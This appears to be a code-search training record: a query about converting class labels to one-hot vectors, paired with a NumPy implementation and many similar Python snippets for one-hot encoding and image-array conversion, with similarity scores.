rgb[1]\n new_array[i][2] += rgb[2]\n i = i + 1\n log.debug(\"In create_array_from_rgb_layers()\\n\\tArray for rgb image \" \\\n \"output:\\n{}\".format(new_array))\n log.debug(\"Exiting create_array_from_rgb_layers\")\n\n return new_array", "def getimgs():", "def get_image_array(self):\n with picamera.array.PiRGBArray(self.camera) as output:\n self.camera.resolution = (640, 480)\n self.camera.capture(output, 'rgb')\n logging.info(\"Captured image of size {0}x{1}x{2}\".format(\n output.array.shape[0], output.array.shape[1], output.array.shape[2]))\n output.truncate(0)\n return output.array\n # self.camera.capture_continuous(self.stream, format='jpeg', use_video_port=True)\n # self.stream.seek(0)\n # image = Image.open(self.stream).convert('RGB').resize((self._input_width, self._input_height), Image.ANTIALIAS)\n # self.stream.seek(0)\n # self.stream.truncate()\n # self.camera.close()", "def get_images(image_folder_root, image_label_list):\n file_dcm=[]\n X = []\n y = []\n for file_name,label in image_label_list:\n try:\n current_file = pydicom.dcmread(image_folder_root + file_name + '.dcm')\n pixel_array = current_file.pixel_array\n if (pixel_array.shape != (512,512)):\n continue\n file_dcm.append((file_name,label,brain_window(current_file)))\n y.append(label)\n X.append(pydicom.dcmread(image_folder_root + file_name + '.dcm').pixel_array)\n except 
ValueError:\n continue\n return X,y", "def stack_images( path, num_frames=50 ):\n # read in the frames\n frames = []\n for i in xrange( 100, 100+num_frames ):\n f = path + str(i) + \".pix\"\n frames.append( pix2array(f) )\n # append the z values to each frame in the sequence\n for i,x in enumerate( frames ):\n tmp = numpy.empty( (x.shape[0], 1), dtype=numpy.int )\n tmp.fill( i )\n frames[i] = numpy.hstack( (x, tmp) )\n return numpy.vstack( frames )", "def get_np_image(self, save_image=False, filename=\"curr_image.png\"):\n responses = client.simGetImages([airsim.ImageRequest(\"front_left\", airsim.ImageType.Scene, False, False)])\n response = responses[0]\n\n # get numpy array\n img1d = np.fromstring(response.image_data_uint8, dtype=np.uint8)\n\n # reshape array to 4 channel image array H X W X 4\n img_rgb = img1d.reshape(response.height, response.width, 3)\n\n # # original image is fliped vertically\n # img_rgb = np.flipud(img_rgb)\n\n if save_image:\n cv2.imwrite(filename, img_rgb)\n\n return img_rgb", "def convert_images_from_uint8(images, drange=[-1,1], nhwc_to_nchw=False):\n if nhwc_to_nchw:\n imgs_roll=np.rollaxis(images, 3, 1)\n return imgs_roll/ 255 *(drange[1] - drange[0])+ drange[0]", "def array_from_img(image):\n return np.array(image)", "def pack_images(images, rows, cols):\n shape = tf.shape(images)\n width = shape[-3]\n height = shape[-2]\n depth = shape[-1]\n images = tf.reshape(images, (-1, width, height, depth))\n batch = tf.shape(images)[0]\n rows = tf.minimum(rows, batch)\n cols = tf.minimum(batch // rows, cols)\n images = images[:rows * cols]\n images = tf.reshape(images, (rows, cols, width, height, depth))\n images = tf.transpose(images, [0, 2, 1, 3, 4])\n images = tf.reshape(images, [1, rows * width, cols * height, depth])\n return images", "def snapshot2(self) -> np.array:\n fbo = self.fbo\n data = fbo.read(components=3, dtype='f4')\n w, h = self.size\n return np.flipud(np.frombuffer(data, dtype='f4').reshape((h, w, 3)))", "def expand_images(X):\n\n X_ex = np.empty((X.shape[0] * X.shape[1], X.shape[2])) * np.nan\n\n for n in range(0, X.shape[2]):\n X_ex[:,n] = X[:,:,n].flatten()\n\n return X_ex", "def extract_data(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(28 * 28 * 10000 * 1)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n data = (data - (255 / 2.0)) / 255\n data = data.reshape(10000, 28, 28, 1)\n return data", "def nb_read_data(data_chunk):\n\t#ensure that the data_chunk has the right length\n\tprint(data_chunk.shape)\n\tassert np.mod(data_chunk.shape[0],3)==0\n\n\tout=np.empty(data_chunk.shape[0]//3*2,dtype=np.uint16)\n\timage1 = np.empty((2048,2048),dtype=np.uint16)\n\timage2 = np.empty((2048,2048),dtype=np.uint16)\n\n\tfor i in nb.prange(data_chunk.shape[0]//3):\n\t\tfst_uint8=np.uint16(data_chunk[i*3])\n\t\tmid_uint8=np.uint16(data_chunk[i*3+1])\n\t\tlst_uint8=np.uint16(data_chunk[i*3+2])\n\n\t\tout[i*2] = (fst_uint8 << 4) + (mid_uint8 >> 4)\n\t\tout[i*2+1] = ((mid_uint8 % 16) << 8) + lst_uint8\n\n\treturn out", "def fits_to_nparray(file):\n hdu_list = fits.open(file)\n image_data = hdu_list[0].data\n image_data=image_data.astype(np.uint16)\n \n gdal_array.SaveArray(image_data, file[:-5]+\".tif\")\n \n return image_data", "def getimg(filename):\n return np.asarray(Image.open('imgdb/'+filename))", "def toNpArray(row):\n image = row[0]\n height = image.height\n width = image.width\n nChannels = image.nChannels\n\n return np.ndarray(\n shape=(height, 
width, nChannels),\n dtype=np.uint8,\n buffer=image.data,\n strides=(width * nChannels, nChannels, 1))", "def create_image_array(files_list):\n im_array = np.array([np.array(cv2.imread(file)) for file in files_list])\n return im_array" ]
[ "0.6674317", "0.6536259", "0.651069", "0.63781893", "0.63752973", "0.63359886", "0.6284267", "0.6278434", "0.6248823", "0.623316", "0.6226097", "0.62114894", "0.6170373", "0.61536634", "0.61412567", "0.61320215", "0.61277705", "0.6126708", "0.6115631", "0.61038214", "0.6049643", "0.60330814", "0.599756", "0.5989057", "0.5974143", "0.5942659", "0.59076196", "0.59008455", "0.5896317", "0.58922434", "0.5878215", "0.5864552", "0.5856562", "0.58460164", "0.5845357", "0.5838753", "0.5822466", "0.5817194", "0.5814712", "0.5813837", "0.58055013", "0.580111", "0.5797613", "0.5795053", "0.57834375", "0.5781453", "0.57790285", "0.5766349", "0.5728666", "0.57284063", "0.5715311", "0.57034564", "0.56928515", "0.56864595", "0.5686363", "0.56853616", "0.5680433", "0.5672675", "0.566893", "0.5663966", "0.5663792", "0.56518245", "0.56458104", "0.564147", "0.563902", "0.56374514", "0.5636205", "0.5633028", "0.5624621", "0.5614163", "0.56095195", "0.5608902", "0.56086224", "0.56074256", "0.56028545", "0.5598171", "0.5589898", "0.55864567", "0.5574737", "0.5573722", "0.5572122", "0.55579066", "0.5554838", "0.5554422", "0.5551967", "0.55476433", "0.5546817", "0.55458564", "0.5541965", "0.55369365", "0.5535213", "0.55330414", "0.55327713", "0.5512152", "0.5511163", "0.5487973", "0.5486011", "0.5484666", "0.54822254", "0.5480896" ]
0.6521254
2
Convert class labels from scalars to onehot vectors.
def dense_to_one_hot(labels_dense, num_classes=10): num_labels = labels_dense.shape[0] index_offset = numpy.arange(num_labels) * num_classes labels_one_hot = numpy.zeros((num_labels, num_classes)) labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1 return labels_one_hot
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def one_hot(labels, classes=None):\n return K.utils.to_categorical(labels, classes)", "def one_hot(labels, classes=None):\n\n one_hot_ = K.utils.to_categorical(labels, classes)\n return(one_hot_)", "def to_onehot(labels: torch.Tensor, num_classes: int) -> torch.Tensor:\n if len(labels.size()) == 1:\n return F.one_hot(labels, num_classes).float()\n return labels", "def to_one_hot(labels, num_classes):\n shape = labels.size()\n shape = shape + (num_classes,)\n one_hot = torch.FloatTensor(shape)\n one_hot.zero_()\n dim = 1 if len(shape) == 2 else 2\n one_hot.scatter_(dim, labels.unsqueeze(-1), 1)\n return one_hot", "def To1hot(label,num_class):\n onehot = np.zeros(num_class)\n onehot[label] = 1\n return onehot", "def one_hot(labels):\n one_hot_labels = np.zeros(labels.shape + (n_actions,))\n for c in range(n_actions):\n one_hot_labels[labels == c, c] = 1.0\n return one_hot_labels", "def _labels_to_one_hot_class(self, labels, mask):\n classes = tf.one_hot(\n tf.cast(labels, tf.int32), self._num_classes, dtype=tf.float32)\n return tf.where(tf.expand_dims(mask, axis=-1), classes, 0.0)", "def _convert_to_onehot_labels(seg_label, num_classes):\n\n batch_size = seg_label.size(0)\n onehot_labels = seg_label.new_zeros((batch_size, num_classes))\n for i in range(batch_size):\n hist = seg_label[i].float().histc(\n bins=num_classes, min=0, max=num_classes - 1)\n onehot_labels[i] = hist > 0\n return onehot_labels", "def one_hot_encode(labels, num_classes=None):\n if num_classes is None:\n num_classes = len(np.unique(labels))\n return np.eye(num_classes)[labels]", "def one_hot_encode(labels, num_classes=None):\n if num_classes is None:\n num_classes = len(np.unique(labels))\n return np.eye(num_classes)[labels]", "def one_hot_encoding(labels, num_classes=10):\n num_labels = labels.shape[0]\n encoded = np.zeros((num_labels, num_classes))\n encoded[np.arange(num_labels), labels[np.arange(num_labels)]] = 1\n \n return encoded", "def dense_to_one_hot(labels, n_classes=2):\n labels = np.array(labels)\n n_labels = labels.shape[0]\n index_offset = np.arange(n_labels) * n_classes\n labels_one_hot = np.zeros((n_labels, n_classes), dtype=np.float32)\n labels_one_hot.flat[index_offset + labels.ravel()] = 1\n return labels_one_hot", "def _onehot_labels(self,\n labels,\n n_classes,\n axis=-1):\n onehot_labels = tf.one_hot(\n tf.squeeze(labels),\n depth=n_classes,\n axis=axis)\n return onehot_labels", "def dense_to_one_hot(labels_dense, num_classes):\r\n num_labels = labels_dense.shape[0]\r\n index_offset = numpy.arange(num_labels) * num_classes\r\n labels_one_hot = numpy.zeros((num_labels, num_classes))\r\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\r\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + 
labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\r\n print ('in onehot', labels_dense, num_classes)\r\n num_labels = labels_dense.shape[0]\r\n index_offset = numpy.arange(num_labels) * num_classes\r\n labels_one_hot = numpy.zeros((num_labels, num_classes))\r\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\r\n return labels_one_hot", "def one_hot_embedding(labels, num_classes):\n y = torch.eye(num_classes) \n return y[labels]", "def class2onehot(class_labels, seq_len, batchsize, num_task):\n\n\n one_hot = torch.FloatTensor(batchsize,seq_len,num_task)\n one_hot.zero_()\n one_hot = one_hot.scatter_(1, seq_len,class_labels, 1)\n\n return one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def label_to_one_hot(label, num_of_class=2):\r\n import numpy as np\r\n one_hot = np.zeros((len(label), num_of_class), dtype=np.uint8)\r\n for i in range(len(label)):\r\n one_hot[i, int(label[i] - 1)] = 1 # label is 1 and 2\r\n\r\n return one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n #print('check num_labels',num_labels)\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def one_hot_embedding(labels, num_classes):\n y = torch.eye(num_classes)\n return y[labels]", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def one_hot_embedding(labels, num_classes):\n y = torch.eye(num_classes) # [D,D]\n return y[labels] # [N,D]", "def one_hot(labels, dim):\n batch_size = labels.size(0)\n out = torch.zeros(batch_size, dim)\n out[np.arange(batch_size), labels.squeeze().long()] = 1\n return out", "def dense_to_one_hot(labels_dense, num_classes):\n\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels)*num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = 
np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def to_one_hot(class_indices, num_classes):\n one_hot_vectors = np.zeros((len(class_indices), num_classes))\n for vector_arg, class_args in enumerate(class_indices):\n one_hot_vectors[vector_arg, class_args] = 1.0\n return one_hot_vectors", "def label2onehot(self, labels, dim):\n batch_size = labels.size(0)\n out = torch.zeros(batch_size, dim)\n out[np.arange(batch_size), labels.long()] = 1\n return out", "def dense_to_one_hot(labels_dense, num_classes):\n\tnum_labels = labels_dense.shape[0]\n\tindex_offset = numpy.arange(num_labels) * num_classes\n\tlabels_one_hot = numpy.zeros((num_labels, num_classes))\n\tlabels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\treturn labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def label2onehot(self, batch_size, labels):\r\n dim = 6\r\n out = torch.zeros(batch_size, dim)\r\n out[np.arange(batch_size), labels] = 1\r\n return out", "def label_to_onehot(labels):\n label_dict = {'THEORETICAL': 0, 'ENGINEERING': 1, 'EMPIRICAL': 2, 'OTHERS': 3}\n onehot = [0, 0, 0, 0]\n for l in labels.split():\n onehot[label_dict[l]] = 1\n return onehot", "def to_onehot(x, num_classes):\n return np.eye(num_classes, dtype='float32')[x]", "def conv_y_to_onehot_mat(labels):\n one_idx = np.array(labels)\n nkind = len(np.unique(one_idx))\n nlabels = len(one_idx)\n\n ret = np.zeros((nkind, nlabels))\n ret[one_idx, np.arange(nlabels)] = 1\n return ret", "def dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes=10):\n\tnum_labels = labels_dense.shape[0]\n\tindex_offset = numpy.arange(num_labels) * num_classes\n\tlabels_one_hot = numpy.zeros((num_labels, num_classes))\n\tlabels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\treturn labels_one_hot", "def dense_to_one_hot(self, labels_dense, num_classes):\n return np.eye(num_classes)[labels_dense]", "def labels_to_one_hot(\n labels: np.ndarray, categories: int, axis: int = 0,\n keepdims=False, dtype=bool\n):\n if keepdims:\n assert labels.shape[axis] == 1\n result_ndim = labels.ndim\n else:\n result_ndim = labels.ndim + 1\n\n if axis < 0:\n axis += result_ndim\n\n shape = labels.shape\n zeros = np.zeros((categories, labels.size), dtype=dtype)\n zeros[labels.ravel(), range(labels.size)] = 1\n\n zeros = zeros.reshape((categories,) + shape)\n\n if keepdims:\n zeros = zeros[(slice(None),) * (axis + 1) + (0,)]\n\n zeros = np.moveaxis(zeros, 0, axis)\n\n return zeros", "def one_hot_embedding(labels, num_classes, device=\"cuda:0\"):\n y = torch.eye(num_classes).to(device)\n return y[labels]", "def one_hot(x, num_classes, dtype=jnp.float32):\n return jax.nn.one_hot(x, 
num_classes).astype(dtype)", "def _dense_to_one_hot(self, labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def DenseToOneHot(labels_dense, num_classes):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def dense_to_one_hot(labels_dense, num_classes):\n\n assert labels_dense.ndim == 1 or labels_dense.ndim == 2\n assert labels_dense.dtype == np.int32\n\n if labels_dense.ndim == 1:\n num_sequences = 0\n sequence_len = labels_dense.shape\n else:\n num_sequences, sequence_len = labels_dense.shape\n\n labels_dense = labels_dense.reshape(-1)\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes), dtype=np.float32)\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n\n if num_sequences > 0:\n labels_one_hot = labels_one_hot.reshape((num_sequences, sequence_len, num_classes))\n\n return labels_one_hot", "def convert_to_onehot(vector, num_classes=None):\n assert isinstance(vector, np.ndarray)\n assert len(vector) > 0\n\n if num_classes is None:\n num_classes = np.max(vector)+1\n else:\n assert num_classes > 0\n assert num_classes >= np.max(vector)\n\n result = np.zeros(shape=(len(vector), num_classes))\n result[np.arange(len(vector)), vector] = 1\n return result.astype(int)", "def dense_to_one_hot(labels_dense, label):\n num_labels = len(labels_dense)\n index_offset = list(labels_dense).index(label)\n labels_one_hot = np.zeros(num_labels)\n labels_one_hot[index_offset] = 1\n return labels_one_hot", "def _onehot(integer_labels):\r\n n_rows = len(integer_labels)\r\n n_cols = integer_labels.max() + 1\r\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\r\n onehot[np.arange(n_rows), integer_labels] = 1\r\n return onehot", "def encode_labels(self, y, num_labels):\n onehot = np.zeros((num_labels, y.shape[0]))\n for i in range(y.shape[0]):\n onehot[y[i], i] = 1.0\n return onehot", "def _one_hot_encode(label_vector, total_num_labels):\n out = np.zeros(shape=(len(label_vector), total_num_labels))\n for i in range(len(label_vector)):\n out[i, int(label_vector[i])] = 1\n return out", "def dense_to_one_hot(labels_dense, num_classes=2):\n # copied from TensorFlow tutorial\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[(index_offset + labels_dense.ravel()).astype(int)] = 1\n return labels_one_hot.astype(np.float32)", "def one_hot_encode(Y, classes):\n if type(classes) is not int:\n return None\n if Y is None or type(Y) != np.ndarray:\n return None\n for c in Y:\n if c >= classes or c < 0:\n return None\n m = Y.shape[0]\n mtx = np.zeros((m, classes))\n\n for row, c_label in zip(mtx, Y):\n row[c_label] = 1\n\n return mtx.T", "def label_to_one_hot(x, labels=None):\n n = len(labels)\n labels_idx = {l: i for i, l in enumerate(labels)}\n if not hasattr(x, '__len__'):\n output = np.zeros((n,))\n output[labels_idx[x]] = 1\n else:\n x = np.array(x, dtype=np.int)\n orig_shp = x.shape\n x = np.reshape(x, (-1))\n x = np.array([labels_idx[_] for _ in x])\n output = np.zeros((x.shape[0], n))\n 
output[np.arange(x.shape[0]), x] = 1\n if len(orig_shp) == 1:\n output_shape = orig_shp + (n,)\n else:\n output_shape = orig_shp[:-1] + (n,)\n output = output.reshape(output_shape)\n\n return output", "def _get_one_hot(targets, num_classes):\n ret = np.zeros((num_classes, targets.shape[0]))\n ret[targets, np.arange(targets.size)] = 1\n return ret", "def dense_to_one_hot(labels_dense, num_classes=2):\n # copied from TensorFlow tutorial\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot", "def one_hot_encode(label, label_values):\n semantic_map = []\n for colour in label_values:\n equality = np.equal(label, colour)\n class_map = np.all(equality, axis = -1)\n semantic_map.append(class_map)\n semantic_map = np.stack(semantic_map, axis=-1)\n\n return semantic_map", "def one_hot(y, num_classes):\n return np.eye(num_classes)[y]", "def onehot_encoding(labels, dim, device):\n out = th.zeros(list(labels.size()) + [dim]).to(device)\n out.scatter_(len(out.size()) - 1, labels.unsqueeze(-1), 1.0)\n return out", "def get_one_hot_encoded(self, label):\n try:\n label = str(label, 'utf-8').lower()\n except:\n label = str(label).lower() # hack for pytest TODO\n vector = np.zeros(self._labels_dim, dtype=int)\n index = self.get_label_2_index(label=label)\n vector[index] = 1\n return vector", "def make_onehot(x,num_labels=7):\n enc = OneHotEncoder(n_values=num_labels)\n return enc.fit_transform(np.array(x).reshape(-1, 1)).toarray()", "def one_hot_encode(self, arr, n_labels):\n one_hot = np.zeros((np.multiply(*arr.shape), n_labels), dtype=np.float32)\n one_hot[np.arange(one_hot.shape[0]), arr.flatten()] = 1.\n one_hot = one_hot.reshape((*arr.shape, n_labels))\n \n return one_hot", "def label_name_to_one_hot(self, label_name):\n label_name_to_int = {n: i for i, n in enumerate(BOX_LABELS)}\n label_id = label_name_to_int[label_name]\n one_hot = np.zeros(shape=[len(BOX_LABELS)], dtype=np.float32)\n one_hot[label_id] = 1\n return one_hot", "def one_hot_encode(x, n_classes):\n return np.eye(n_classes)[x]", "def preprocess_labels(y):\n\n y = tf.keras.utils.to_categorical(y, nclasses)\n\n return y", "def to_one_hot(arr, num_classes):\n arr = arr.data.astype(int)\n a = np.zeros((arr.shape[0], num_classes))\n a[np.arange(len(a)), arr] = 1\n return tensor.Tensor(a, requires_grad=True)", "def to_one_hot(arr, num_classes):\n arr = arr.data.astype(int)\n a = np.zeros((arr.shape[0], num_classes))\n a[np.arange(len(a)), arr] = 1\n return tensor.Tensor(a, requires_grad=True)", "def convert_to_one_hot(pos_lbl, neg_lbl, num_classes: int) -> torch.Tensor:\n one_hot_targets = torch.LongTensor(num_classes).zero_() - 1\n if isinstance(pos_lbl, list) and (len(pos_lbl) > 0):\n assert (\n max(pos_lbl) < num_classes\n ), \"Class Index must be less than number of classes\"\n one_hot_targets.scatter_(0, torch.Tensor(pos_lbl).long(), 1)\n if isinstance(neg_lbl, list) and (len(neg_lbl) > 0):\n assert (\n max(neg_lbl) < num_classes\n ), \"Class Index must be less than number of classes\"\n one_hot_targets.scatter_(0, torch.Tensor(neg_lbl).long(), 0)\n return one_hot_targets.squeeze()", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, 
nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n\ttargets = np.array(data).reshape(-1)\n\treturn np.eye(nb_classes)[targets]", "def get_onehot(tensor, labels=10):\n one_hot = np.zeros((tensor.shape[0], labels))\n one_hot[range(tensor.shape[0]), tensor.astype(int)] = 1.\n return one_hot", "def onehot_encode_labels(y):\n\treturn OneHotEncoder(categories=\"auto\", sparse=False).fit_transform(y.reshape(y.shape[0],1))", "def one_hot(class_ids, num_classes):\n oh = np.zeros((len(class_ids), num_classes), dtype=np.float32)\n oh[np.arange(len(class_ids)), class_ids] = 1\n\n assert (oh.argmax(axis=1) == class_ids).all()\n assert (oh.sum(axis=1) == 1).all()\n\n return oh", "def indices_to_one_hot(cls_indeces, nb_classes):\n targets = np.array(cls_indeces).reshape(-1)\n return np.eye(nb_classes)[targets]", "def get_one_hot_vector(number):\n from sklearn.preprocessing import LabelBinarizer\n encoder = LabelBinarizer()\n seed_vector = np.arange(10)\n encoder.fit(seed_vector)\n labels = encoder.transform(seed_vector)\n return labels.astype(np.float32)", "def dense_to_one_hot(label_dense,num_classes=2): # scalars 标量 一个one-hot向量除了某一位的数字是1以外其余各维度数字都是0\n num_labels = label_dense.shape[0]\n index_offset = np.arange(num_labels)*num_classes # idnex_offset该下标表表示的是一维时候每个labels的对应下标 arange一个参数时,参数值为终点,起点取默认值0,步长取默认值1\n labels_one_hot = np.zeros((num_labels,num_classes))\n labels_one_hot.flat[index_offset+label_dense.ravel()] = 1 # 对one_hot矩阵的指定的位置进行赋值1的操作 index_offset+labels_dense.ravel() 得到的是一个下标 flat属性返回的是一个array的遍历对象,此时它是一维形式的 ravel()返回的是一个副本,但是这个副本是原来数据的引用,有点类似于c++的引用。主要是减少存储空间的使用。返回的也是一个一维形式的数据\n return labels_one_hot", "def one_hot_encoding(gt, num_classes):\n if gt.ndim == 1:\n # multi-class classification\n return F.one_hot(gt, num_classes=num_classes)\n else:\n # binary classification\n # example. [[0], [1], [1]]\n # multi-label classification\n # example. 
[[0, 1, 1], [1, 0, 0], [1, 1, 1]]\n return gt", "def indices_one_hot(labels_indices, num_classes=10):\n \n num_labels = labels_indices.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_indices.ravel()] = 1\n \n return labels_one_hot", "def indices_one_hot(labels_indices, num_classes=10):\n\n num_labels = labels_indices.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_indices.ravel()] = 1\n\n return labels_one_hot", "def unhot(one_hot_labels):\n return np.argmax(one_hot_labels, axis=1)", "def convert_multiclass_to_binary_labels(multiclass_labels):\n if isinstance(multiclass_labels, torch.Tensor):\n binary_labels = torch.zeros_like(multiclass_labels)\n elif isinstance(multiclass_labels, np.ndarray):\n binary_labels = np.zeros_like(multiclass_labels)\n\n binary_labels[multiclass_labels != 0] = 1\n\n return binary_labels", "def onehot(inputs, num_classes):\n num_sample = inputs.size(0)\n inputs_onehot = torch.zeros(num_sample, num_classes)\n inputs_onehot.scatter_(1, inputs.unsqueeze(1), 1.0)\n return inputs_onehot", "def _onehot(y, n_classes=False):\n if not n_classes:\n \"\"\"Create one-hot encoded labels.\"\"\"\n n_classes = len(set(y))\n out = np.zeros((len(y), n_classes))\n for i, ii in enumerate(y):\n out[i][ii] += 1\n y_onehot = out.astype(int)\n return y_onehot", "def one_hot(y_):\n y_ = y_.reshape(len(y_))\n n_values = int(np.max(y_)) + 1\n n_values = 6\n return np.eye(n_values)[np.array(y_, dtype=np.int32)] # Returns FLOATS", "def onehot(t, num_classes):\n assert isinstance(t, torch.LongTensor)\n return torch.zeros(t.size()[0], num_classes).scatter_(1, t.view(-1, 1), 1)", "def one_hot_encoded(class_numbers, num_classes=None):\n\n # Find the number of classes if None is provided.\n # Assumes the lowest class-number is zero.\n if num_classes is None:\n num_classes = np.max(class_numbers) + 1\n\n return np.eye(num_classes, dtype=float)[class_numbers]", "def one_hot_encoded(class_numbers, num_classes=None):\n\n # Find the number of classes if None is provided.\n # Assumes the lowest class-number is zero.\n if num_classes is None:\n num_classes = np.max(class_numbers) + 1\n\n return np.eye(num_classes, dtype=float)[class_numbers]", "def labels_to_labels(class_labels, num_classes =4):\n levels = []\n for label in class_labels:\n levels_from_label = label_to_levels(int(label), num_classes=num_classes)\n levels.append(levels_from_label)\n return torch.stack(levels).cuda()", "def convert_to_one_hot(a):\n a = a[:, 0]\n a = a.astype(int)\n A = np.zeros((len(a), config.num_classes))\n A[np.arange(len(a)), a] = 1\n return A", "def convert_to_one_hot_labels(input, target, val=0):\n \n tmp = input.new(target.size(0), target.max() + 1).fill_(-1)\n tmp.scatter_(1, target.view(-1, 1), 1.0)\n # for some activation functions, e.g. relu\n if val == 0:\n ret = (tmp + 1) / 2\n # for some activation functions, e.g. 
tanh\n if val == -1:\n ret = tmp\n return ret", "def to_categorical(index_label, num_classes):\n return index_label, np.eye(num_classes, dtype='uint8')[index_label]", "def dense_to_one_hot(labels_dense, num_classes, nlevels=1):\n if nlevels == 1:\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes), dtype=np.int32)\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n elif nlevels == 2:\n # assume that labels_dense has same column length\n num_labels = labels_dense.shape[0]\n num_length = labels_dense.shape[1]\n labels_one_hot = np.zeros((num_labels, num_length, num_classes), dtype=np.int32)\n layer_idx = np.arange(num_labels).reshape(num_labels, 1)\n # this index selects each component separately\n component_idx = np.tile(np.arange(num_length), (num_labels, 1))\n # then we use `a` to select indices according to category label\n 